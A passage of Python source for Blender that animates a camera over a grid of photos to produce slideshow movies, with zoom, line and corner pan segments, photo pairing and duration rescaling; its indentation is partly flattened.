coordinates (float array of 1 items in [-inf, inf], (never None)) – Coordinates to fit in
Return (co_return, scale_return):
co_return, The location to aim to be able to see all given points, float array of 3 items in [-inf, inf]
scale_return, The ortho scale to aim to be able to see all given points (if relevant), float in [-inf, inf]
'''
    # Zooms the camera in toward a photo and back out again
def showDeleiteTwoPhotos (self, duration=120, picName1=None, picName2=None):
import bpy
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
if picName1 is None:
numPhotos = len(self.slideshow.photos)
startIdx = random.randint(1, numPhotos)
picName1 = 'pic' + str(startIdx)
pic1 = bpy.data.objects[picName1]
if picName2 is None:
numPhotos = len(self.slideshow.photos)
startIdx = random.randint(1, numPhotos)
picName2 = 'pic' + str(startIdx)
pic2 = bpy.data.objects[picName2]
pos = [0, 0, 0]
pos[0] = (pic1.location.x + pic2.location.x) / 2.0
pos[1] = (pic1.location.y + pic2.location.y) / 2.0
pos[2] = (pic1.location.z + pic2.location.z) / 2.0
#initZ1 = random.uniform(5.0, 5.5)
#initZ2 = random.uniform(4.5, 5.0)
initZ1 = random.uniform(3.01, 3.5)
initZ2 = random.uniform(2.5, 3.0)
#factorRandom1 = random.uniform(0.26, 0.31)
factorRandom1 = random.uniform(0.01, 0.05)
factorRandom2 = random.uniform(0.01, 0.05)
cam.rotation_mode = 'XYZ'
cam.location.x = pos[0] + random.uniform(- factorRandom1, factorRandom1)
cam.location.y = pos[1] + random.uniform(- factorRandom1, factorRandom1) + ADJUST_Y
cam.location.z = pos[2] + initZ1
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.scale[0] = 1.0
cam.scale[1] = 1.0
cam.scale[2] = 1.0
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.keyframe_insert(data_path="scale", frame=self.frame)
'''
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + initZ + 3.0
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + math.ceil(duration/2))
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + math.ceil(duration/2))
'''
        # symmetric jitter, mirroring how factorRandom1 is used above
        cam.location.x = pos[0] + random.uniform(-factorRandom2, factorRandom2)
        cam.location.y = pos[1] + random.uniform(-factorRandom2, factorRandom2) + ADJUST_Y
cam.location.z = pos[2] + initZ2
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
'''
scene = bpy.context.scene
c1Pic1 = self.getCorner1(pic1)
c2Pic1 = self.getCorner2(pic1)
c3Pic1 = self.getCorner3(pic1)
c4Pic1 = self.getCorner4(pic1)
c1Pic2 = self.getCorner1(pic2)
c2Pic2 = self.getCorner2(pic2)
c3Pic2 = self.getCorner3(pic2)
c4Pic2 = self.getCorner4(pic2)
co_return, scale_return = cam.camera_fit_coords(scene, (c1Pic1[0], c1Pic1[1], c1Pic1[2], c2Pic1[0], c2Pic1[1], c2Pic1[2], c3Pic1[0], c3Pic1[1], c3Pic1[2], c4Pic1[0], c4Pic1[1], c4Pic1[2], c1Pic2[0], c1Pic2[1], c1Pic2[2], c2Pic2[0], c2Pic2[1], c2Pic2[2], c3Pic2[0], c3Pic2[1], c3Pic2[2], c4Pic2[0], c4Pic2[1], c4Pic2[2]))
cam.location.x = co_return[0]
cam.location.y = co_return[1]
#cam.location.z = co_return[2]
cam.scale[0] = scale_return
cam.scale[1] = scale_return
cam.scale[2] = scale_return
'''
self.showObjects([pic1, pic2])
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12)
#cam.keyframe_insert(data_path="scale", frame=self.frame + duration - 12)
self.frame = self.frame + duration
def getCorner1 (self, pic):
result = None
result = [0, 0, 0]
result[0] = pic.location.x - (pic.dimensions[0]/2.0)
result[1] = pic.location.y + (pic.dimensions[1]/2.0)
result[2] = pic.location.z
return result
def getCorner2 (self, pic):
result = None
result = [0, 0, 0]
result[0] = pic.location.x + (pic.dimensions[0]/2.0)
result[1] = pic.location.y + (pic.dimensions[1]/2.0)
result[2] = pic.location.z
return result
def getCorner3 (self, pic):
result = None
result = [0, 0, 0]
result[0] = pic.location.x - (pic.dimensions[0]/2.0)
result[1] = pic.location.y - (pic.dimensions[1]/2.0)
result[2] = pic.location.z
return result
def getCorner4 (self, pic):
result = None
result = [0, 0, 0]
result[0] = pic.location.x + (pic.dimensions[0]/2.0)
result[1] = pic.location.y - (pic.dimensions[1]/2.0)
result[2] = pic.location.z
return result
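    # A compact alternative sketch (same arithmetic as the four helpers above):
    #
    #     def getCorners(self, pic):
    #         hx, hy = pic.dimensions[0] / 2.0, pic.dimensions[1] / 2.0
    #         x, y, z = pic.location.x, pic.location.y, pic.location.z
    #         return [[x - hx, y + hy, z], [x + hx, y + hy, z],
    #                 [x - hx, y - hy, z], [x + hx, y - hy, z]]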
    # Zooms the camera in toward a photo and back out again
def showDeleiteOnePhoto (self, duration=120, picName=None):
import bpy
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
if picName is None:
numPhotos = len(self.slideshow.photos)
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
pic = bpy.data.objects[picName]
#initZ1 = random.uniform(2.51, 3.0)
#initZ2 = random.uniform(2.0, 2.5)
initZ1 = random.uniform(2.01, 2.5)
initZ2 = random.uniform(1.8, 2.0)
#factorRandom1 = random.uniform(0.06, 0.10)
factorRandom1 = random.uniform(0.01, 0.05)
factorRandom2 = random.uniform(0.01, 0.05)
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(- factorRandom1, factorRandom1)
cam.location.y = pic.location.y + random.uniform(- factorRandom1, factorRandom1) + ADJUST_Y
cam.location.z = pic.location.z + initZ1
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.scale[0] = 1.0
cam.scale[1] = 1.0
cam.scale[2] = 1.0
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.keyframe_insert(data_path="scale", frame=self.frame)
'''
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + initZ + 3.0
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + math.ceil(duration/2))
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + math.ceil(duration/2))
'''
        # symmetric jitter, mirroring how factorRandom1 is used above
        cam.location.x = pic.location.x + random.uniform(-factorRandom2, factorRandom2)
        cam.location.y = pic.location.y + random.uniform(-factorRandom2, factorRandom2) + ADJUST_Y
cam.location.z = pic.location.z + initZ2
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
'''
scene = bpy.context.scene
c1Pic1 = self.getCorner1(pic)
c2Pic1 = self.getCorner2(pic)
c3Pic1 = self.getCorner3(pic)
c4Pic1 = self.getCorner4(pic)
co_return, scale_return = cam.camera_fit_coords(scene, (c1Pic1[0], c1Pic1[1], c1Pic1[2], c2Pic1[0], c2Pic1[1], c2Pic1[2], c3Pic1[0], c3Pic1[1], c3Pic1[2], c4Pic1[0], c4Pic1[1], c4Pic1[2]))
cam.location.x = co_return[0]
cam.location.y = co_return[1]
#cam.location.z = co_return[2]
cam.scale[0] = scale_return
cam.scale[1] = scale_return
cam.scale[2] = scale_return
'''
self.showObjects([pic])
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12)
#cam.keyframe_insert(data_path="scale", frame=self.frame + duration - 12)
self.frame = self.frame + duration
    # Zooms the camera in toward a photo and back out again
def showDeleiteOnePhotoProject (self, duration=120):
import bpy
numPhotos = len(self.slideshow.photos)
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
pic = bpy.data.objects[picName]
initZ1 = random.uniform(1.5, 1.8)
initZ2 = random.uniform(1.5, 1.8)
initZ3 = random.uniform(1.5, 1.8)
factorRandom1 = random.uniform(0.50, 1.00)
factorRandom2 = random.uniform(0.01, 0.05)
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01 - factorRandom1, 0.01 + factorRandom1)
cam.location.y = pic.location.y + random.uniform(-0.01 - factorRandom1, 0.01 + factorRandom1)
cam.location.z = pic.location.z + initZ1
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
'''
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + initZ + 3.0
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + math.ceil(duration/2))
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + math.ceil(duration/2))
'''
cam.location.x = pic.location.x + random.uniform(-0.01 - factorRandom2, 0.01 + factorRandom2)
cam.location.y = pic.location.y + random.uniform(-0.01 - factorRandom2, 0.01 + factorRandom2)
cam.location.z = pic.location.z + initZ2
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + (duration/2))
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + (duration/2))
cam.location.x = pic.location.x + random.uniform(-0.01 - factorRandom2, 0.01 + factorRandom2)
cam.location.y = pic.location.y + random.uniform(-0.01 - factorRandom2, 0.01 + factorRandom2)
cam.location.z = pic.location.z + initZ3
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + (duration))
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + (duration))
self.frame = self.frame + duration
    # Zooms the camera in toward a photo and back out again
def showDeleiteOnePhotoSection (self, duration=120):
import bpy
numPhotos = len(self.slideshow.photos)
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
pic = bpy.data.objects[picName]
initZ1 = random.uniform(4.5, 6.0)
initZ2 = random.uniform(3.0, 4.0)
factorRandom1 = random.uniform(0.50, 1.00)
factorRandom2 = random.uniform(0.01, 0.05)
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01 - factorRandom1, 0.01 + factorRandom1)
cam.location.y = pic.location.y + random.uniform(-0.01 - factorRandom1, 0.01 + factorRandom1)
cam.location.z = pic.location.z + initZ1
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
'''
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + initZ + 3.0
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + math.ceil(duration/2))
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + math.ceil(duration/2))
'''
cam.location.x = pic.location.x + random.uniform(-0.01 - factorRandom2, 0.01 + factorRandom2)
cam.location.y = pic.location.y + random.uniform(-0.01 - factorRandom2, 0.01 + factorRandom2)
cam.location.z = pic.location.z + initZ2
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration)
self.frame = self.frame + duration
def doAnimSlideshow (self, folderImages, time=None, movieOutput=None):
import bpy
result = None
bpy.context.scene.world.light_settings.use_ambient_occlusion = True
bpy.context.scene.world.light_settings.ao_factor = 1.0
bpy.context.scene.render.alpha_mode = 'TRANSPARENT'
#filepath imgBackground
#bpy.context.scene.node_tree.nodes['imgBackground'].filepath = '/home/jmramoss/Descargas/low-poly-abstract-background/background.jpg'
bpy.data.images['background'].filepath = '/home/jmramoss/Descargas/low-poly-abstract-background/background2.jpg'
print("$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ folderImages = " + str(folderImages))
self.buildScene(folderImages)
#camLookAt()0
self.camRotate(0, 0, 0)
#showPicture('pic2')
numPhotos = len(self.slideshow.photos)
sizeBorder = int(math.sqrt(numPhotos))
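# sizeBorder assumes the photos form a square NxN grid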
if time is None:
if sizeBorder > 4:
time = int(float(numPhotos) * 2.5)
else:
time = numPhotos * 3
rest = list()
for i in range(0, numPhotos):
pic = 'pic' + str((i+1))
rest.append(pic)
dataAnim = list()
#dataAnim.append({'type': 'zoom_in', 'time': 240})
#dataAnim.append({'type': 'zoom_out', 'time': 120})
#dataAnim.append({'type': 'corners', 'start': picCorner, 'end': picExtremo, 'time': 360})
#dataAnim.append({'type': 'line', 'start': picStart, 'end': picExtremo, 'time': 360})
#dataAnim.append({'type': 'one', 'pic': picOne, 'time': 120})
#dataAnim.append({'type': 'two', 'pic1': picOne, 'pic2': picTwo, 'time': 120})
#dataAnim.append({'type': 'two', 'pic1': picOne, 'pic2': picTwo, 'time': 120})
#dataAnim.append({'type': 'two', 'pic1': picOne, 'pic2': picTwo, 'time': 120})
#dataAnim.append({'type': 'two', 'pic1': picOne, 'pic2': picTwo, 'time': 120})
durationZoomIn = 240
durationZoomOut = 120
durationCorner = 760
durationLine = 560
durationTwoPhotos = 120
durationOnePhoto = 120
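# Per-grid-size tuning of segment durations (values are frames; 24 fps is assumed below)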
if sizeBorder == 6:
durationZoomIn = 240
durationZoomOut = 120
durationCorner = 760
durationLine = 560
elif sizeBorder == 5:
durationZoomIn = 192
durationZoomOut = 96
durationCorner = 700
durationLine = 500
elif sizeBorder == 4:
durationZoomIn = 144
durationZoomOut = 72
durationCorner = 640
durationLine = 440
elif sizeBorder == 3:
durationZoomIn = 72
durationZoomOut = 48
durationCorner = 580
durationLine = 380
elif sizeBorder == 2:
durationZoomIn = 72
durationZoomOut = 48
durationCorner = 520
durationLine = 320
picZoomIn = int(numPhotos / 2)
picZoomOut = picZoomIn + 1
if sizeBorder == 6:
picZoomIn = 15
picZoomOut = 22
elif sizeBorder == 5:
picZoomIn = 12
picZoomOut = 14
elif sizeBorder == 4:
picZoomIn = 6
picZoomOut = 11
elif sizeBorder == 3:
picZoomIn = 4
picZoomOut = 6
elif sizeBorder == 2:
picZoomIn = 1
picZoomOut = 4
picZoomInName = 'pic' + str(picZoomIn)
picZoomOutName = 'pic' + str(picZoomOut)
if picZoomInName in rest:
rest.remove(picZoomInName)
if picZoomOutName in rest:
rest.remove(picZoomOutName)
if sizeBorder > 3:
#corner
picCorners = self.getCornerPictures()
picCorner = random.choice(picCorners)
picExtremo = self.getPicExtremoCorner(picCorner)
if picCorner in picCorners:
picCorners.remove(picCorner)
if picExtremo in picCorners:
picCorners.remove(picExtremo)
if picCorner in rest:
rest.remove(picCorner)
if picExtremo in rest:
rest.remove(picExtremo)
picMiddle = self.getPicMiddle(picCorner, picExtremo)
for itemMiddle in picMiddle:
if itemMiddle in rest:
rest.remove(itemMiddle)
dataAnim.append({'type': 'corners', 'start': picCorner, 'end': picExtremo, 'time': durationCorner, 'zoom': 1})
if sizeBorder >= 5:
vecinosCorner = self.getPicVecinosCorner(picCorner, picExtremo)
for itemVecino in vecinosCorner:
if itemVecino in rest:
rest.remove(itemVecino)
#self.showLinePhotos(duration=360, picNameStart=picCorner, picNameEnd=picExtremo, zoom=2)
if sizeBorder > 3:
#line
allBorders = self.getExternPictures()
picBorders = list()
for pic in allBorders:
if pic not in picCorners:
picBorders.append(pic)
#picBorders = [x for x in self.getExternPictures() if x not in picCorners]
picStart = random.choice(picBorders)
picExtremo = self.getPicExtremo(picStart)
if picStart in picBorders:
picBorders.remove(picStart)
if picExtremo in picBorders:
picBorders.remove(picExtremo)
if picStart in rest:
rest.remove(picStart)
if picExtremo in rest:
rest.remove(picExtremo)
picMiddle = self.getPicMiddle(picStart, picExtremo)
for itemMiddle in picMiddle:
if itemMiddle in rest:
rest.remove(itemMiddle)
dataAnim.append({'type': 'line', 'start': picStart, 'end': picExtremo, 'time': durationLine, 'zoom': 0})
#self.showLinePhotos(duration=360, picNameStart=picStart, picNameEnd=picExtremo, zoom=1)
numPendientes = len(rest)
numParejas = int((1.0/3.0)*numPendientes)
numIndividuales = numPendientes - (2*numParejas)
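# Roughly one third of the leftover photos become pair animations (each pair
# consumes two photos); whatever cannot be paired is shown individually.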
while numParejas > 0:
item = random.choice(rest)
masCercana = self.getPhotoMasCercana(item, rest)
if item is not None and masCercana is not None:
if item in rest:
rest.remove(item)
if masCercana in rest:
rest.remove(masCercana)
dataAnim.append({'type': 'two', 'pic1': item, 'pic2': masCercana, 'time': durationTwoPhotos})
numParejas -= 1
else:
break  # no valid partner left; remaining pairs fall through to individual shots
numIndividuales += (2*numParejas)
while numIndividuales > 0:
item = random.choice(rest)
if item is not None:
if item in rest:
rest.remove(item)
dataAnim.append({'type': 'one', 'pic': item, 'time': durationOnePhoto})
numIndividuales -= 1
#self.showDeleiteOnePhoto(duration=120, picName='pic1')
#dataAnim.append({'type': 'one', 'pic': 'pic1', 'time': 120})
#self.showDeleiteTwoPhotos(duration=120, picName1='pic1', picName2='pic2')
#dataAnim.append({'type': 'two', 'pic1': 'pic1', 'pic2': 'pic12', 'time': 120})
if time is not None:
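# Rescale every segment proportionally so the whole animation lasts 'time' seconds at 24 fps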
totalTimeFrames = 0
totalTimeFrames += durationZoomIn
for itemAnim in dataAnim:
totalTimeFrames += itemAnim['time']
totalTimeFrames += durationZoomOut
maxTimeFrames = time * 24
if totalTimeFrames != maxTimeFrames:
porcentaje = float(maxTimeFrames) / float(totalTimeFrames)
durationZoomIn = int(porcentaje * float(durationZoomIn))
durationZoomOut = int(porcentaje * float(durationZoomOut))
for itemAnim in dataAnim:
itemAnim['time'] = int(porcentaje * float(itemAnim['time']))
#zoom in
self.showAllPhotosPicZoomIn(picName=picZoomInName, duration=durationZoomIn)
while len(dataAnim) > 0:
itemAnim = random.choice(dataAnim)
if itemAnim['type'] == 'corners':
self.showLinePhotosGroup(duration=itemAnim['time'], picNameStart=itemAnim['start'], picNameEnd=itemAnim['end'], zoom=itemAnim['zoom'], groupStart=self.get4PicsCorner(itemAnim['start']), groupEnd=self.get4PicsCorner(itemAnim['end']))
elif itemAnim['type'] == 'line':
self.showLinePhotosGroup(duration=itemAnim['time'], picNameStart=itemAnim['start'], picNameEnd=itemAnim['end'], zoom=itemAnim['zoom'], groupStart=None, groupEnd=None)
elif itemAnim['type'] == 'one':
self.showDeleiteOnePhoto(duration=itemAnim['time'], picName=itemAnim['pic'])
elif itemAnim['type'] == 'two':
self.showDeleiteTwoPhotos(duration=itemAnim['time'], picName1=itemAnim['pic1'], picName2=itemAnim['pic2'])
if itemAnim in dataAnim:
dataAnim.remove(itemAnim)
#zoom out
self.showAllPhotosPicZoomOut(picName=picZoomOutName, duration=durationZoomOut)
frameEnd = self.frame
#frameEnd = 120
#frameEnd = numPhotos * 120
result = self.saveMovie(frameStart=1, frameEnd=frameEnd, movieOutput=movieOutput)
return result
def getPhotoMasCercana (self, pivot, listado):
result = None
curDistance = float('inf')  # sentinel: any real distance is smaller
for item in listado:
if item != pivot:
distance = self.getPhotoDistance(pivot, item)
if distance < curDistance:
result = item
curDistance = distance
return result
def getPhotoDistance (self, item1, item2):
result = None
if item1 is not None and item2 is not None:
import bpy
pic1 = bpy.data.objects[item1]
pic2 = bpy.data.objects[item2]
result = math.sqrt(math.pow((pic1.location.x - pic2.location.x), 2) + math.pow((pic1.location.y - pic2.location.y), 2) + math.pow((pic1.location.z - pic2.location.z), 2))
return result
def doAnimSceneDeleiteAllPhotos (self, folderImages, movieOutput=None):
import bpy
result = None
bpy.context.scene.world.light_settings.use_ambient_occlusion = True
bpy.context.scene.world.light_settings.ao_factor = 1.0
print("$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ folderImages = " + str(folderImages))
self.buildScene(folderImages)
#camLookAt()0
self.camRotate(0, 0, 0)
#showPicture('pic2')
numPhotos = len(self.slideshow.photos)
'''
for i in range(0, numPhotos):
#startIdx = random.randint(1, numPhotos)
startIdx = i + 1
picName = 'pic' + str(startIdx)
#self.showDeleiteOnePhoto(duration=120, picName=picName)
self.showDeleiteDuration(duration=240, picName=picName)
'''
'''
for i in range(0, numPhotos):
#startIdx = random.randint(1, numPhotos)
startIdx = i + 1
picNameStart = 'pic' + str(startIdx)
for j in range(0, numPhotos):
endIdx = j + 1
picNameEnd = 'pic' + str(endIdx)
if i != j:
self.showLinePhotos(duration=120, picNameStart=picNameStart, picNameEnd=picNameEnd)
'''
'''
for i in range(0, numPhotos):
startIdx = i + 1
picNameStart = 'pic' + str(startIdx)
for j in range(0, numPhotos):
endIdx = j + 1
picNameEnd = 'pic' + str(endIdx)
if i != j:
for k in range(0, numPhotos):
picDistance = 'pic' + str((k+1))
distance = self.distancePic2Line2Pics(picDistance, picNameStart, picNameEnd)
print("start = " + picNameStart + " end = " + picNameEnd + " distance " + str(distance) + " to " + picDistance)
picBorders = self.getExternPictures()
for pic1 in picBorders:
for pic2 in picBorders:
if pic1 != pic2:
pendiente = self.getPendiente2Pics(pic1, pic2)
pendiente = pendiente if pendiente is not None else 'None'
print('pendiente = ' + str(pendiente) + " pics = " + pic1 + "+" + pic2)
picBorders = self.getExternPictures()
print("borders = " + str(picBorders))
for pic1 in picBorders:
print("for " + pic1 + " extremo is = " + str(self.getPicExtremo(pic1)))
#print("for pic2 extremo is = " + str(self.getPicExtremo('pic2')))
'''
'''
picBorders = self.getExternPictures()
for picBorder1 in picBorders:
picExtremo = self.getPicExtremo(picBorder1)
for k in range(0, numPhotos):
picDistance = 'pic' + str((k+1))
distance = self.distancePic2Line2Pics(picDistance, picBorder1, picExtremo)
if distance < 0.5:
print("start = " + picBorder1 + " end = " + picExtremo + " distance " + str(distance) + " to " + picDistance)
'''
rest = list()
for i in range(0, numPhotos):
pic = 'pic' + str((i+1))
rest.append(pic)
'''
maxTry3 = 10
picBorders = self.getExternPictures()
while len(rest) > 0 and maxTry3 > 0:
picBorder = None
picExtremo = None
maxTry2 = 10
while maxTry2 > 0:
picBorder = None
maxTry = 10
while maxTry > 0:
picBorder = random.choice(picBorders)
if picBorder in rest:
break
maxTry -= 1
if picBorder is not None:
picExtremo = self.getPicExtremo(picBorder)
if picExtremo in rest:
break
maxTry2 -= 1
if picBorder is not None and picExtremo is not None:
picMiddle = self.getPicMiddle(picBorder, picExtremo)
valid = True if len(picMiddle) <= 0 else False
for itemMiddle in picMiddle:
if itemMiddle in rest:
valid = True
break
if valid:
if picBorder in rest:
rest.remove(picBorder)
if picExtremo in rest:
rest.remove(picExtremo)
for itemMiddle in picMiddle:
if itemMiddle in rest:
rest.remove(itemMiddle)
else:
maxTry3 -= 1
self.showLinePhotos(duration=120, picNameStart=picBorder, picNameEnd=picExtremo)
else:
maxTry3 -= 1
'''
'''
maxTry3 = 10
#picBorders = self.getExternPictures()
picBorders = self.getCornerPictures()
while len(rest) > 0 and maxTry3 > 0:
line = self.selectLinePath(rest, picBorders)
if line is None:
maxTry3 -= 1
else:
print("rest = " + str(rest))
print("line = " + str(line))
self.showLinePhotos(duration=48, picNameStart=line[0], picNameEnd=line[1])
'''
'''
for zoom in range(1, 4):
picCorners = self.getCornerPictures()
for i in range(0, 2):
picCorner = random.choice(picCorners)
picExtremo = self.getPicExtremoCorner(picCorner)
picCorners.remove(picCorner)
picCorners.remove(picExtremo)
self.showLinePhotos(duration=240, picNameStart=picCorner, picNameEnd=picExtremo, zoom=zoom)
'''
self.showAllPhotos(duration=120, zoom=True)
self.showAllPhotos(duration=120, zoom=False)
frameEnd = self.frame
#frameEnd = numPhotos * 120
result = self.saveMovie(frameStart=1, frameEnd=frameEnd, movieOutput=movieOutput)
return result
def selectLinePath (self, rest, picBorders=None):
result = None
maxTry3 = 10
picBorders = self.getExternPictures() if picBorders is None else picBorders
#print("strssssss" + str(picBorders))
while maxTry3 > 0:
picBorder = None
picExtremo = None
maxTry2 = 10
while maxTry2 > 0:
picBorder = None
maxTry = 10
while maxTry > 0:
picBorder = random.choice(picBorders)
if picBorder in rest:
break
picBorder = None
maxTry -= 1
if picBorder is not None:
picExtremo = self.getPicExtremo(picBorder)
if picExtremo in rest and picExtremo in picBorders:
break
picExtremo = None
maxTry2 -= 1
if picBorder is not None and picExtremo is not None:
picMiddle = self.getPicMiddle(picBorder, picExtremo)
valid = len(picMiddle) == 0
for itemMiddle in picMiddle:
if itemMiddle in rest:
valid = True
break
if valid:
if picBorder in rest:
rest.remove(picBorder)
if picExtremo in rest:
rest.remove(picExtremo)
for itemMiddle in picMiddle:
if itemMiddle in rest:
rest.remove(itemMiddle)
result = (picBorder, picExtremo)
#self.showLinePhotos(duration=120, picNameStart=picBorder, picNameEnd=picExtremo)
break
else:
maxTry3 -= 1
else:
maxTry3 -= 1
return result
def getPicMiddle (self, picStart, picEnd):
result = list()
numPhotos = len(self.slideshow.photos)
for k in range(0, numPhotos):
picDistance = 'pic' + str((k+1))
if picDistance != picStart and picDistance != picEnd:
distance = self.distancePic2Line2Pics(picDistance, picStart, picEnd)
if distance < 0.5:
#print("start = " + picBorder1 + " end = " + picExtremo + " distance " + str(distance) + " to " + picDistance)
result.append(picDistance)
return result
def getPicVecinosCorner (self, picStart, picEnd):
result = list()
numPhotos = len(self.slideshow.photos)
for k in range(0, numPhotos):
picDistance = 'pic' + str((k+1))
if picDistance != picStart and picDistance != picEnd:
distance = self.distancePic2Line2Pics(picDistance, picStart, picEnd)
#print("start = " + picStart + " end = " + picEnd + " distance " + str(distance) + " to " + picDistance)
if distance > 0.5 and distance < 1.0:
#print("start = " + picBorder1 + " end = " + picExtremo + " distance " + str(distance) + " to " + picDistance)
result.append(picDistance)
return result
def get4PicsCorner(self, picName):
result = list()
result.append(picName)
numPhotos = len(self.slideshow.photos)
for k in range(0, numPhotos):
picDistance = 'pic' + str((k+1))
if picDistance != picName:
distance = self.distance2Pics(picDistance, picName)
print("picDistance = " + picDistance + " distance " + str(distance) + " to " + picName)
if distance < 1.65:
#print("start = " + picBorder1 + " end = " + picExtremo + " distance " + str(distance) + " to " + picDistance)
result.append(picDistance)
#print(str(result))
#quit()
return result
def getPicExtremo (self, picName):
result = None
if picName is not None:
picIdx = int(picName[3:]) - 1
numPhotos = len(self.slideshow.photos)
sizeBorder = int(math.sqrt(numPhotos))
idxCorner1 = 0
idxCorner2 = (sizeBorder - 1)
idxCorner3 = (numPhotos - 1)
idxCorner4 = (numPhotos - sizeBorder)
div = int(picIdx / sizeBorder)
div1 = int((picIdx + 1) / sizeBorder)
mod = int(picIdx % sizeBorder)
mod1 = int((picIdx + 1) % sizeBorder)
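# Grid arithmetic: div is the row of picIdx; mod/mod1 flag the first/last column.
# 'vertical'/'horizontal' mark border cells whose opposite extreme lies straight across.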
corner = picIdx in (idxCorner1, idxCorner2, idxCorner3, idxCorner4)
vertical = div == 0 or div == (sizeBorder - 1)
